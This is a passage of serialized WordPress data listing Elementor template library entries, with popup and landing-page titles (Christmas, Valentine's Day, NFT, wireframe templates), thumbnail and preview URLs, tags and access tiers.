2\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-4-Small.jpg\";s:12:\"tmpl_created\";i:1647859838;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/slide-in-cta-christmas-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Christmas\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:98;a:21:{s:4:\"tmpl\";i:1382;s:2:\"id\";i:23483;s:5:\"title\";s:26:\"Fly-In | CTA | Christmas 3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-1-Small.jpg\";s:12:\"tmpl_created\";i:1647860157;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/popups/fly-in-cta-christmas-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:31:\"[\"Christmas\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:99;a:21:{s:4:\"tmpl\";i:1383;s:2:\"id\";i:23489;s:5:\"title\";s:33:\"Slide-In | Discount | Christmas 4\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-5-Small.jpg\";s:12:\"tmpl_created\";i:1647860302;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-discount-christmas-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:31:\"[\"Christmas\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:100;a:21:{s:4:\"tmpl\";i:1384;s:2:\"id\";i:23496;s:5:\"title\";s:32:\"Classic | Discount | Christmas 5\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-3-Small.jpg\";s:12:\"tmpl_created\";i:1647860454;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-discount-christmas-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Christmas\",\"Offer\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:101;a:21:{s:4:\"tmpl\";i:1385;s:2:\"id\";i:23523;s:5:\"title\";s:30:\"Classic | CTA | Valentines Day\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/Valentines-Day-2-Small.jpg\";s:12:\"tmpl_created\";i:1647860912;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-valentines-day/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"cta\",\"Valentine\'s Day\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:102;a:21:{s:4:\"tmpl\";i:1386;s:2:\"id\";i:23529;s:5:\"title\";s:39:\"Hello Bar | Discount | Valentines Day 2\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/Valentines-Day-1-Small.jpg\";s:12:\"tmpl_created\";i:1647861064;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/hello-bar-discount-valentines-day-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:30:\"[\"Discount\",\"Valentine\'s Day\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:103;a:21:{s:4:\"tmpl\";i:1387;s:2:\"id\";i:23536;s:5:\"title\";s:32:\"Classic | CTA | Valentines Day 3\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/Valentines-Day-3-Small.jpg\";s:12:\"tmpl_created\";i:1647861536;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-cta-valentines-day-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"cta\",\"Valentine\'s Day\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:104;a:21:{s:4:\"tmpl\";i:1388;s:2:\"id\";i:23586;s:5:\"title\";s:51:\"Fly-In | Subscribe | Health & Wellness Company\";s:9:\"thumbnail\";s:103:\"https://library.elementor.com/wp-content/uploads/2022/03/35-Subscribe-Health-Wellness-Company-Small.jpg\";s:12:\"tmpl_created\";i:1647862008;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/fly-in-subscribe-health-wellness-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:24:\"[\"Business\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:105;a:21:{s:4:\"tmpl\";i:1389;s:2:\"id\";i:23592;s:5:\"title\";s:34:\"Classic | Subscribe | Tech Company\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/36-Subscribe-Tech-Company-Small.jpg\";s:12:\"tmpl_created\";i:1647866706;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/classic-subscribe-tech-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"Marketing\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:106;a:21:{s:4:\"tmpl\";i:1390;s:2:\"id\";i:23598;s:5:\"title\";s:36:\"Classic | Contact Us | Fight Classes\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/37-Contact-Us-Fight-Classes-Small.jpg\";s:12:\"tmpl_created\";i:1647866869;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-contact-us-fight-classes/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"Contact\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:107;a:21:{s:4:\"tmpl\";i:1391;s:2:\"id\";i:23611;s:5:\"title\";s:31:\"Classic | CTA | Mochi Shop Sale\";s:9:\"thumbnail\";s:99:\"https://library.elementor.com/wp-content/uploads/2022/03/39-Click-Through-Mochi-Shop-Sale-Small.jpg\";s:12:\"tmpl_created\";i:1647867750;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-cta-mochi-shop-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"cta\",\"Offer\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:108;a:21:{s:4:\"tmpl\";i:1392;s:2:\"id\";i:23618;s:5:\"title\";s:28:\"Classic | CTA | Fashion Shop\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2022/03/40-Click-Through-Fashion-Shop-Small.jpg\";s:12:\"tmpl_created\";i:1647868251;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-cta-fashion-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:109;a:21:{s:4:\"tmpl\";i:1393;s:2:\"id\";i:23624;s:5:\"title\";s:29:\"Fly-In | Login | Tech Company\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/41-Login-Tech-Company-Small.jpg\";s:12:\"tmpl_created\";i:1647868704;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/fly-in-login-tech-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:9:\"[\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:110;a:21:{s:4:\"tmpl\";i:1394;s:2:\"id\";i:23630;s:5:\"title\";s:36:\"Fly-In | Verification | Liquor Store\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/42-Verification-Liquor-Store-Small.jpg\";s:12:\"tmpl_created\";i:1647870308;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-verification-liquor-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:16:\"[\"Verification\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:111;a:21:{s:4:\"tmpl\";i:1395;s:2:\"id\";i:23636;s:5:\"title\";s:39:\"Hello Bar | Subscribe | Online Magazine\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/44-Subscribe-Online-Magazine-Small.jpg\";s:12:\"tmpl_created\";i:1647870465;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/hello-bar-subscribe-online-magazine/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:20:\"[\"Blog\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:112;a:21:{s:4:\"tmpl\";i:1396;s:2:\"id\";i:23642;s:5:\"title\";s:27:\"Fly-In | Login | Health Spa\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/43-Login-Health-Spa-Small.jpg\";s:12:\"tmpl_created\";i:1647872427;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/fly-in-login-health-spa/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:20:\"[\"Login\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:113;a:21:{s:4:\"tmpl\";i:1397;s:2:\"id\";i:23648;s:5:\"title\";s:33:\"Fly-In | Verification | Wine Shop\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/45-Verification-Wine-Shop-Small.jpg\";s:12:\"tmpl_created\";i:1647872627;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/fly-in-verification-wine-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:16:\"[\"Verification\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:114;a:21:{s:4:\"tmpl\";i:1421;s:2:\"id\";i:24235;s:5:\"title\";s:24:\"Ladydog Club – NFT\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/05/Ladydog_Club.jpg\";s:12:\"tmpl_created\";i:1651525072;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/lp/ladydog-club-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:115;a:21:{s:4:\"tmpl\";i:1422;s:2:\"id\";i:24166;s:5:\"title\";s:15:\"Dot – NFT\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2022/05/Dot-250_280.jpg\";s:12:\"tmpl_created\";i:1651525117;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/lp/dot-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:116;a:21:{s:4:\"tmpl\";i:1423;s:2:\"id\";i:24191;s:5:\"title\";s:28:\"Cosmic Neighbors – NFT\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Cosmic_Neighbors-250_280.jpg\";s:12:\"tmpl_created\";i:1651525124;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/cosmic-neighbors-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:117;a:21:{s:4:\"tmpl\";i:1424;s:2:\"id\";i:24255;s:5:\"title\";s:30:\"Happy Food Friends – NFT\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/05/Featured_Image.jpg\";s:12:\"tmpl_created\";i:1651525475;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/happy-food-friends-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:118;a:21:{s:4:\"tmpl\";i:1443;s:2:\"id\";i:24599;s:5:\"title\";s:27:\"Wireframe – Courses 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Courses-1.jpg\";s:12:\"tmpl_created\";i:1653989626;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/wireframe-courses-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:180:\"[\"About\",\"Academy\",\"Booking\",\"Business\",\"Course Online\",\"Features\",\"Footer\",\"Landing Pages\",\"Online Service\",\"Professional\",\"School\",\"Services\",\"Subscribe\",\"Teacher\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:119;a:21:{s:4:\"tmpl\";i:1444;s:2:\"id\";i:24614;s:5:\"title\";s:28:\"Wireframe – Services 1\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-1-2.jpg\";s:12:\"tmpl_created\";i:1653990084;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:139:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Form\",\"Header\",\"Landing Pages\",\"Online Service\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:120;a:21:{s:4:\"tmpl\";i:1445;s:2:\"id\";i:24629;s:5:\"title\";s:28:\"Wireframe – Services 2\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-2-2.jpg\";s:12:\"tmpl_created\";i:1653990132;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:123:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Form\",\"Gallery\",\"Landing Pages\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:121;a:21:{s:4:\"tmpl\";i:1446;s:2:\"id\";i:24644;s:5:\"title\";s:27:\"Wireframe – Webinar 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Webinar-1.jpg\";s:12:\"tmpl_created\";i:1653990164;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/wireframe-webinar-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:177:\"[\"About\",\"Academy\",\"Booking\",\"Conference\",\"Course Online\",\"Education\",\"Features\",\"Footer\",\"Form\",\"Landing Pages\",\"Online Event\",\"Online Service\",\"Subscribe\",\"Virtual\",\"Webinar\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:122;a:21:{s:4:\"tmpl\";i:1447;s:2:\"id\";i:24655;s:5:\"title\";s:28:\"Wireframe – Services 3\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-3-2.jpg\";s:12:\"tmpl_created\";i:1653990198;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:143:\"[\"About\",\"Agency\",\"Business\",\"Contact\",\"Footer\",\"Form\",\"Gallery\",\"Landing 